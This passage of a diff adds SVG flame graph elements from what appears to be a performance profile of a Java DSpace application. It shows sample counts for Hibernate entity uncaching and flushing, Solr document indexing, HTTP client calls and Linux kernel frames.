+<title>[libjvm.so] (2 samples, 0.16%)</title><rect x="1161.0" y="357" width="1.8" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1163.97" y="367.5" ></text>
+</g>
+<g >
+<title>itable stub (1 samples, 0.08%)</title><rect x="1101.0" y="421" width="1.0" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="1104.03" y="431.5" ></text>
+</g>
+<g >
+<title>org/dspace/discovery/SolrServiceImpl:::buildDocument (411 samples, 32.62%)</title><rect x="762.0" y="533" width="384.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="765.02" y="543.5" >org/dspace/discovery/SolrServiceImpl:::buildDocument</text>
+</g>
+<g >
+<title>__hrtimer_run_queues (1 samples, 0.08%)</title><rect x="87.7" y="629" width="1.0" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="90.73" y="639.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/EntityEnclosingRequestWrapper$EntityWrapper:::writeTo (1 samples, 0.08%)</title><rect x="1149.7" y="341" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1152.73" y="351.5" ></text>
+</g>
+<g >
+<title>org/hibernate/internal/SessionImpl:::listeners (2 samples, 0.16%)</title><rect x="1121.6" y="405" width="1.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1124.63" y="415.5" ></text>
+</g>
+<g >
+<title>finish_task_switch (1 samples, 0.08%)</title><rect x="114.9" y="773" width="0.9" height="15.0" fill="rgb(242,111,111)" rx="2" ry="2" />
+<text  x="117.89" y="783.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/util/ClientUtils:::writeXML (5 samples, 0.40%)</title><rect x="805.1" y="421" width="4.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="808.10" y="431.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/request/RequestWriter$LazyContentStream:::getStream (1 samples, 0.08%)</title><rect x="809.8" y="453" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="812.78" y="463.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="1135.7" y="277" width="0.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1138.68" y="287.5" ></text>
+</g>
+<g >
+<title>perf_pmu_enable.part.0 (48 samples, 3.81%)</title><rect x="14.7" y="677" width="44.9" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="17.68" y="687.5" >perf..</text>
+</g>
+<g >
+<title>org/hibernate/engine/spi/CascadingAction:::requiresNoCascadeChecking (2 samples, 0.16%)</title><rect x="656.2" y="437" width="1.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="659.19" y="447.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::prepareQueryStatement (1 samples, 0.08%)</title><rect x="759.2" y="357" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="762.21" y="367.5" ></text>
+</g>
+<g >
+<title>update_nohz_stats (1 samples, 0.08%)</title><rect x="59.6" y="629" width="1.0" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="62.63" y="639.5" ></text>
+</g>
+<g >
+<title>org/dspace/core/HibernateDBConnection:::uncacheEntity (682 samples, 54.13%)</title><rect x="118.6" y="533" width="638.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="121.63" y="543.5" >org/dspace/core/HibernateDBConnection:::uncacheEntity</text>
+</g>
+<g >
+<title>x86_pmu_enable (4 samples, 0.32%)</title><rect x="10.0" y="661" width="3.7" height="15.0" fill="rgb(249,121,121)" rx="2" ry="2" />
+<text  x="13.00" y="671.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/WrapVisitor:::processValue (10 samples, 0.79%)</title><rect x="224.5" y="405" width="9.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="227.46" y="415.5" ></text>
+</g>
+<g >
+<title>org/hibernate/persister/entity/AbstractEntityPersister:::getEntityName (1 samples, 0.08%)</title><rect x="662.7" y="437" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="665.75" y="447.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/ManyToOneType:::isDirty (1 samples, 0.08%)</title><rect x="1088.9" y="405" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1091.86" y="415.5" ></text>
+</g>
+<g >
+<title>itable stub (1 samples, 0.08%)</title><rect x="920.3" y="373" width="0.9" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="923.29" y="383.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/request/QueryRequest:::process (9 samples, 0.71%)</title><rect x="1146.9" y="517" width="8.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1149.92" y="527.5" ></text>
+</g>
+<g >
+<title>__ip_finish_output (19 samples, 1.51%)</title><rect x="93.3" y="581" width="17.8" height="15.0" fill="rgb(230,93,93)" rx="2" ry="2" />
+<text  x="96.35" y="591.5" ></text>
+</g>
+<g >
+<title>flexible_sched_in (1 samples, 0.08%)</title><rect x="64.3" y="581" width="1.0" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="67.32" y="591.5" ></text>
+</g>
+<g >
+<title>org/hibernate/internal/SessionImpl:::listeners (1 samples, 0.08%)</title><rect x="766.7" y="485" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="769.70" y="495.5" ></text>
+</g>
+<g >
+<title>itable stub (3 samples, 0.24%)</title><rect x="118.6" y="437" width="2.8" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="121.63" y="447.5" ></text>
+</g>
+<g >
+<title>sun/reflect/GeneratedMethodAccessor16:::invoke (98 samples, 7.78%)</title><rect x="664.6" y="501" width="91.8" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="667.62" y="511.5" >sun/reflec..</text>
+</g>
+<g >
+<title>finish_task_switch (4 samples, 0.32%)</title><rect x="10.0" y="709" width="3.7" height="15.0" fill="rgb(242,111,111)" rx="2" ry="2" />
+<text  x="13.00" y="719.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1,118 samples, 88.73%)</title><rect x="118.6" y="837" width="1047.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="121.63" y="847.5" >[libjvm.so]</text>
+</g>
+<g >
+<title>sun/reflect/UnsafeIntegerFieldAccessorImpl:::get (1 samples, 0.08%)</title><rect x="738.6" y="453" width="0.9" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="741.60" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/AbstractEntityJoinWalker:::initStatementString (3 samples, 0.24%)</title><rect x="1009.3" y="421" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1012.25" y="431.5" ></text>
+</g>
+<g >
+<title>JVM_InvokeMethod (1,118 samples, 88.73%)</title><rect x="118.6" y="677" width="1047.1" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="121.63" y="687.5" >JVM_InvokeMethod</text>
+</g>
+<g >
+<title>__errno_location (1 samples, 0.08%)</title><rect x="1149.7" y="229" width="1.0" height="15.0" fill="rgb(233,98,98)" rx="2" ry="2" />
+<text  x="1152.73" y="239.5" ></text>
+</g>
+<g >
+<title>update_blocked_averages (1 samples, 0.08%)</title><rect x="80.2" y="565" width="1.0" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="83.24" y="575.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc/PgStatement:::executeInternal (1 samples, 0.08%)</title><rect x="761.1" y="341" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="764.08" y="351.5" ></text>
+</g>
+<g >
+<title>jshort_disjoint_arraycopy (1 samples, 0.08%)</title><rect x="1011.1" y="341" width="1.0" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="1014.13" y="351.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::doQueryAndInitializeNonLazyCollections (7 samples, 0.56%)</title><rect x="312.5" y="469" width="6.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="315.49" y="479.5" ></text>
+</g>
+<g >
+<title>__hrtimer_run_queues (1 samples, 0.08%)</title><rect x="990.5" y="293" width="1.0" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="993.52" y="303.5" ></text>
+</g>
+<g >
+<title>JVM_FillInStackTrace (1 samples, 0.08%)</title><rect x="797.6" y="117" width="0.9" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="800.60" y="127.5" ></text>
+</g>
+<g >
+<title>put_prev_entity (1 samples, 0.08%)</title><rect x="115.8" y="757" width="1.0" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="118.83" y="767.5" ></text>
+</g>
+<g >
+<title>org/apache/http/entity/mime/AbstractMultipartForm:::doWriteTo (1 samples, 0.08%)</title><rect x="1149.7" y="309" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1152.73" y="319.5" ></text>
+</g>
+<g >
+<title>exit_to_usermode_loop (12 samples, 0.95%)</title><rect x="1178.8" y="757" width="11.2" height="15.0" fill="rgb(234,99,99)" rx="2" ry="2" />
+<text  x="1181.76" y="767.5" ></text>
+</g>
+<g >
+<title>ip_output (19 samples, 1.51%)</title><rect x="93.3" y="613" width="17.8" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="96.35" y="623.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/AbstractStandardBasicType:::isCollectionType (3 samples, 0.24%)</title><rect x="233.8" y="405" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="236.83" y="415.5" ></text>
+</g>
+<g >
+<title>itable stub (2 samples, 0.16%)</title><rect x="1007.4" y="421" width="1.9" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="1010.38" y="431.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::execute (7 samples, 0.56%)</title><rect x="1148.8" y="453" width="6.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1151.79" y="463.5" ></text>
+</g>
+<g >
+<title>itable stub (1 samples, 0.08%)</title><rect x="317.2" y="405" width="0.9" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="320.17" y="415.5" ></text>
+</g>
+<g >
+<title>swapgs_restore_regs_and_return_to_usermode (1 samples, 0.08%)</title><rect x="518.5" y="405" width="1.0" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="521.52" y="415.5" ></text>
+</g>
+<g >
+<title>org/hibernate/context/internal/ThreadLocalSessionContext$TransactionProtectionWrapper:::invoke (369 samples, 29.29%)</title><rect x="319.0" y="501" width="345.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="322.05" y="511.5" >org/hibernate/context/internal/ThreadLocalSess..</text>
+</g>
+<g >
+<title>sun/reflect/UnsafeQualifiedObjectFieldAccessorImpl:::get (1 samples, 0.08%)</title><rect x="262.9" y="421" width="0.9" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="265.86" y="431.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::getOrphans (17 samples, 1.35%)</title><rect x="621.5" y="405" width="16.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="624.54" y="415.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="969.0" y="373" width="0.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="971.98" y="383.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/AbstractStandardBasicType:::isCollectionType (1 samples, 0.08%)</title><rect x="733.9" y="453" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="736.92" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/internal/TwoPhaseLoad:::doInitializeEntity (1 samples, 0.08%)</title><rect x="776.1" y="437" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="779.06" y="447.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/WrapVisitor:::processValue (24 samples, 1.90%)</title><rect x="497.0" y="421" width="22.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="499.98" y="431.5" >o..</text>
+</g>
+<g >
+<title>org/hibernate/engine/internal/EntityEntryContext:::reentrantSafeEntityEntries (2 samples, 0.16%)</title><rect x="754.5" y="453" width="1.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="757.52" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/descriptor/java/AbstractTypeDescriptor:::areEqual (2 samples, 0.16%)</title><rect x="529.8" y="421" width="1.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="532.76" y="431.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::flushEntities (90 samples, 7.14%)</title><rect x="876.3" y="421" width="84.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="879.27" y="431.5" >org/hiber..</text>
+</g>
+<g >
+<title>switch_fpu_return (1 samples, 0.08%)</title><rect x="82.1" y="837" width="0.9" height="15.0" fill="rgb(227,90,90)" rx="2" ry="2" />
+<text  x="85.11" y="847.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::setCurrentSession (1 samples, 0.08%)</title><rect x="412.7" y="421" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="415.70" y="431.5" ></text>
+</g>
+<g >
+<title>__intel_pmu_enable_all.constprop.0 (1 samples, 0.08%)</title><rect x="223.5" y="197" width="1.0" height="15.0" fill="rgb(230,93,93)" rx="2" ry="2" />
+<text  x="226.52" y="207.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::doQueryAndInitializeNonLazyCollections (1 samples, 0.08%)</title><rect x="782.6" y="421" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="785.62" y="431.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/io/AbstractMessageWriter:::write (1 samples, 0.08%)</title><rect x="1160.0" y="357" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1163.03" y="367.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="1161.9" y="293" width="0.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1164.90" y="303.5" ></text>
+</g>
+<g >
+<title>scheduler_tick (1 samples, 0.08%)</title><rect x="223.5" y="277" width="1.0" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="226.52" y="287.5" ></text>
+</g>
+<g >
+<title>x86_pmu_enable (12 samples, 0.95%)</title><rect x="1178.8" y="661" width="11.2" height="15.0" fill="rgb(249,121,121)" rx="2" ry="2" />
+<text  x="1181.76" y="671.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (26 samples, 2.06%)</title><rect x="1165.7" y="853" width="24.3" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1168.65" y="863.5" >[..</text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/PersistentList:::readFrom (1 samples, 0.08%)</title><rect x="314.4" y="437" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="317.37" y="447.5" ></text>
+</g>
+<g >
+<title>org/dspace/servicemanager/config/DSpaceConfigurationService:::convert (24 samples, 1.90%)</title><rect x="845.4" y="501" width="22.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="848.37" y="511.5" >o..</text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="817.3" y="309" width="0.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="820.27" y="319.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/JoinWalker:::selectString (1 samples, 0.08%)</title><rect x="1011.1" y="405" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1014.13" y="415.5" ></text>
+</g>
+<g >
+<title>sun/reflect/UnsafeObjectFieldAccessorImpl:::get (11 samples, 0.87%)</title><rect x="532.6" y="421" width="10.3" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="535.57" y="431.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/EntityType:::resolve (1 samples, 0.08%)</title><rect x="314.4" y="405" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="317.37" y="415.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/CollectionType:::resolve (1 samples, 0.08%)</title><rect x="779.8" y="373" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="782.81" y="383.5" ></text>
+</g>
+<g >
+<title>org/dspace/discovery/FullTextContentStreams$FullTextEnumeration:::nextElement (5 samples, 0.40%)</title><rect x="788.2" y="453" width="4.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="791.24" y="463.5" ></text>
+</g>
+<g >
+<title>org/dspace/core/HibernateDBConnection:::uncacheEntity (583 samples, 46.27%)</title><rect x="118.6" y="517" width="546.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="121.63" y="527.5" >org/dspace/core/HibernateDBConnection:::uncacheEntity</text>
+</g>
+<g >
+<title>slow_subtype_check Runtime1 stub (1 samples, 0.08%)</title><rect x="803.2" y="453" width="1.0" height="15.0" fill="rgb(232,96,96)" rx="2" ry="2" />
+<text  x="806.22" y="463.5" ></text>
+</g>
+<g >
+<title>[unknown] (54 samples, 4.29%)</title><rect x="10.0" y="869" width="50.6" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="13.00" y="879.5" >[unkn..</text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::doQueryAndInitializeNonLazyCollections (1 samples, 0.08%)</title><rect x="777.0" y="277" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="780.00" y="287.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::flushCollections (3 samples, 0.24%)</title><rect x="873.5" y="421" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="876.46" y="431.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.16%)</title><rect x="859.4" y="341" width="1.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="862.41" y="351.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="1150.7" y="325" width="0.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1153.67" y="335.5" ></text>
+</g>
+<g >
+<title>org/apache/http/protocol/HttpRequestExecutor:::doSendRequest (10 samples, 0.79%)</title><rect x="792.9" y="421" width="9.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="795.92" y="431.5" ></text>
+</g>
+<g >
+<title>do_syscall_64 (4 samples, 0.32%)</title><rect x="10.0" y="821" width="3.7" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="13.00" y="831.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/WriterAppender:::append (1 samples, 0.08%)</title><rect x="788.2" y="373" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="791.24" y="383.5" ></text>
+</g>
+<g >
+<title>org/apache/http/entity/mime/MultipartEntity:::writeTo (10 samples, 0.79%)</title><rect x="792.9" y="341" width="9.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="795.92" y="351.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/PGStream:::receiveTupleV3 (3 samples, 0.24%)</title><rect x="767.6" y="389" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="770.63" y="399.5" ></text>
+</g>
+<g >
+<title>itable stub (18 samples, 1.43%)</title><rect x="335.9" y="437" width="16.9" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="338.90" y="447.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/MapConfiguration$1:::entrySet (16 samples, 1.27%)</title><rect x="851.0" y="421" width="15.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="853.98" y="431.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/FlushVisitor:::processCollection (1 samples, 0.08%)</title><rect x="542.9" y="437" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="545.87" y="447.5" ></text>
+</g>
+<g >
+<title>sock_def_readable (1 samples, 0.08%)</title><rect x="98.0" y="293" width="1.0" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="101.03" y="303.5" ></text>
+</g>
+<g >
+<title>org/apache/http/protocol/HttpRequestExecutor:::preProcess (1 samples, 0.08%)</title><rect x="818.2" y="421" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="821.21" y="431.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/spi/CollectionEntry:::getOrphans (6 samples, 0.48%)</title><rect x="985.8" y="389" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="988.84" y="399.5" ></text>
+</g>
+<g >
+<title>prepare_exit_to_usermode (1 samples, 0.08%)</title><rect x="518.5" y="389" width="1.0" height="15.0" fill="rgb(242,111,111)" rx="2" ry="2" />
+<text  x="521.52" y="399.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc/PgStatement:::executeInternal (1 samples, 0.08%)</title><rect x="777.9" y="357" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="780.94" y="367.5" ></text>
+</g>
+<g >
+<title>call_stub (1,118 samples, 88.73%)</title><rect x="118.6" y="789" width="1047.1" height="15.0" fill="rgb(226,89,89)" rx="2" ry="2" />
+<text  x="121.63" y="799.5" >call_stub</text>
+</g>
+<g >
+<title>org/apache/http/impl/entity/EntitySerializer:::serialize (1 samples, 0.08%)</title><rect x="815.4" y="341" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="818.40" y="351.5" ></text>
+</g>
+<g >
+<title>apic_timer_interrupt (2 samples, 0.16%)</title><rect x="1117.9" y="373" width="1.9" height="15.0" fill="rgb(232,96,96)" rx="2" ry="2" />
+<text  x="1120.89" y="383.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$GroupHead:::match (1 samples, 0.08%)</title><rect x="843.5" y="485" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="846.49" y="495.5" ></text>
+</g>
+<g >
+<title>newidle_balance (1 samples, 0.08%)</title><rect x="59.6" y="693" width="1.0" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="62.63" y="703.5" ></text>
+</g>
+<g >
+<title>jbyte_disjoint_arraycopy (1 samples, 0.08%)</title><rect x="815.4" y="261" width="0.9" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="818.40" y="271.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/conn/ManagedClientConnectionImpl:::receiveResponseHeader (1 samples, 0.08%)</title><rect x="1158.2" y="389" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1161.16" y="399.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::wasInitialized (2 samples, 0.16%)</title><rect x="334.0" y="437" width="1.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="337.03" y="447.5" ></text>
+</g>
+<g >
+<title>__x64_sys_futex (4 samples, 0.32%)</title><rect x="10.0" y="805" width="3.7" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="13.00" y="815.5" ></text>
+</g>
+<g >
+<title>kmem_cache_alloc_node (2 samples, 0.16%)</title><rect x="86.8" y="693" width="1.9" height="15.0" fill="rgb(225,87,87)" rx="2" ry="2" />
+<text  x="89.79" y="703.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/EntityType:::isEntityType (1 samples, 0.08%)</title><rect x="953.1" y="389" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="956.06" y="399.5" ></text>
+</g>
+<g >
+<title>Java_java_net_SocketInputStream_socketRead0 (2 samples, 0.16%)</title><rect x="1161.0" y="389" width="1.8" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="1163.97" y="399.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultFlushEntityEventListener:::onFlushEntity (58 samples, 4.60%)</title><rect x="679.6" y="453" width="54.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="682.60" y="463.5" >org/h..</text>
+</g>
+<g >
+<title>apic_timer_interrupt (1 samples, 0.08%)</title><rect x="80.2" y="645" width="1.0" height="15.0" fill="rgb(232,96,96)" rx="2" ry="2" />
+<text  x="83.24" y="655.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/internal/Cascade:::cascade (9 samples, 0.71%)</title><rect x="746.1" y="453" width="8.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="749.10" y="463.5" ></text>
+</g>
+<g >
+<title>call_stub (1 samples, 0.08%)</title><rect x="1150.7" y="277" width="0.9" height="15.0" fill="rgb(226,89,89)" rx="2" ry="2" />
+<text  x="1153.67" y="287.5" ></text>
+</g>
+<g >
+<title>sun/reflect/UnsafeObjectFieldAccessorImpl:::get (4 samples, 0.32%)</title><rect x="549.4" y="437" width="3.8" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="552.43" y="447.5" ></text>
+</g>
+<g >
+<title>java/io/InputStream:::read (1 samples, 0.08%)</title><rect x="797.6" y="293" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="800.60" y="303.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::withTemporarySessionIfNeeded (1 samples, 0.08%)</title><rect x="777.9" y="421" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="780.94" y="431.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/CombinedConfiguration:::fetchNodeList (4 samples, 0.32%)</title><rect x="845.4" y="453" width="3.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="848.37" y="463.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$GroupHead:::match (1 samples, 0.08%)</title><rect x="843.5" y="421" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="846.49" y="431.5" ></text>
+</g>
+<g >
+<title>tcp_v4_rcv (3 samples, 0.24%)</title><rect x="97.1" y="341" width="2.8" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="100.10" y="351.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::isDirty (1 samples, 0.08%)</title><rect x="411.8" y="421" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="414.76" y="431.5" ></text>
+</g>
+<g >
+<title>java/lang/System:::identityHashCode (1 samples, 0.08%)</title><rect x="779.8" y="341" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="782.81" y="351.5" ></text>
+</g>
+<g >
+<title>org/apache/http/protocol/HttpRequestExecutor:::execute (10 samples, 0.79%)</title><rect x="792.9" y="437" width="9.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="795.92" y="447.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/internal/Cascade:::cascade (35 samples, 2.78%)</title><rect x="275.0" y="421" width="32.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="278.03" y="431.5" >or..</text>
+</g>
+<g >
+<title>sock_recvmsg (23 samples, 1.83%)</title><rect x="60.6" y="789" width="21.5" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="63.57" y="799.5" >s..</text>
+</g>
+<g >
+<title>org/apache/http/impl/DefaultConnectionReuseStrategy:::keepAlive (1 samples, 0.08%)</title><rect x="811.7" y="421" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="814.65" y="431.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/AbstractType:::isCollectionType (1 samples, 0.08%)</title><rect x="258.2" y="421" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="261.17" y="431.5" ></text>
+</g>
+<g >
+<title>eth_type_trans (1 samples, 0.08%)</title><rect x="110.2" y="501" width="0.9" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
